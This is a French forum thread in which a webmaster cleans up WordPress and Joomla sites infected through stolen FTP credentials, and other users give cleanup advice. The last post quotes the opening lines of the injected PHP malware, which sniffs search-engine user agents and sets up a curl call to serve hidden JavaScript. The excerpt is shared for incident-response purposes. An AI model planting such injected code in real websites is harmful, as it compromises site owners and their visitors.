Discussion :

[eveilside]

Salut à tous,

Suite à un virus sur un pc qui a récupérer les codes FTP certainement via le fichier XML de filezilla, j'ai plusieurs sites infectés par un script js crypté.

Ce script était ajouté sur toutes les pages .HTML et .htm, j'ai donc changer les codes ftp et supprimer manuellement le code sur toutes les pages infectées.

Ce sont des sites sur wordpress et joomla , sur wordpress une fois le code supprimé dans les pages html plus de soucis...
Par contre sur joomla il y a toujours un code js qui est présent.

Le code supprimé dans les pages html était de cette forme

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script>var s=new String().....</script>

Le code qui apparait toujours sur joomla est de la forme :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script>w=Window;aa....</script>

Et il apparait tout en haut de la page, avant même le doctype...

J'ai fait une recherche avec notepad++ dans tous les fichiers à la recherche de ce fameux code mais je n'ai rien trouvé...

Quelqu'un à t'il une idée ? Comment savoir d'ou vient ce code ?

Joomla charge des modules et des templates donc pas évident de remonter tout le code pour savoir qu'elles sont les pages chargées....

Quand on affiche la source de la page, on voit bien ce code, y a t'il un module firefox ou autre qui permet de savoir de quelle page provient ce code ?

Merci pour votre aide.

[10_GOTO_10]

Si c'est du code JavaScript, le mieux est de le décoder. En général le codage en question est juste un remplacement ou un codage relativement simple (HEXA, BASE64).
Après, c'est plus facile de savoir d'où ça vient (il y a forcément un iframe, un lien ou un truc comme ça).
Sinon avec FireFox et le plugin FireBug, on doit pouvoir le visualiser directement (mais ça veut aussi dire l'exécuter, à tes risques et périls).

[Elboras]

Bonjour,

Suite à un virus sur un pc qui a récupérer les codes FTP certainement via le fichier XML de filezilla, j'ai plusieurs sites infectés par un script js crypté.

Ce script était ajouté sur toutes les pages .HTML et .htm, j'ai donc changer les codes ftp et supprimer manuellement le code sur toutes les pages infectées.

Pouvez-vous apporter des détails qui vous permettent de tirer ces conclusions ? Êtes-vous certain de ces différents points ?

Si c'est le cas, afin de trouver ou la modification de code à été opéré, peut-être pourriez vous regarder les logs de votre serveur FTP afin de connaitre les fichiers qui ont été modifiés.
De plus, vous avez certainement des backup d'avant l'infection, vous pourrez alors regarder la différence (par exemple avec diff) si un fichier à été modifié.

Dans certain cas, rétablir les fichiers modifiés et supprimé les nouveaux pourrait-être une solution viable

[eveilside]

Merci pour vos réponses,

Et oui ELBORAS, c'est bien de cette façon qu'ont été ajoutés les scripts.

Donc ce matin jai fait un winmerg sur la version en ligne et la version locale que j'avais (chose qui ne m'était pas venue à l'esprit hier, comme quoi la nuit porte conseil ) et j'ai retrouvé la partie de code qui avait été ajoutée.

Donc tout les fichiers html avait un script ajouté que j'avais déjà trouvé, par contre le code que je ne retrouvé pas était un code php qui affichait un code javascript d'ou le probleme...

Un code du style :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

<?

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)

Pour ceux que ça interesse. Voilà, merci quand même pour vos réponses !! Et bonne année !!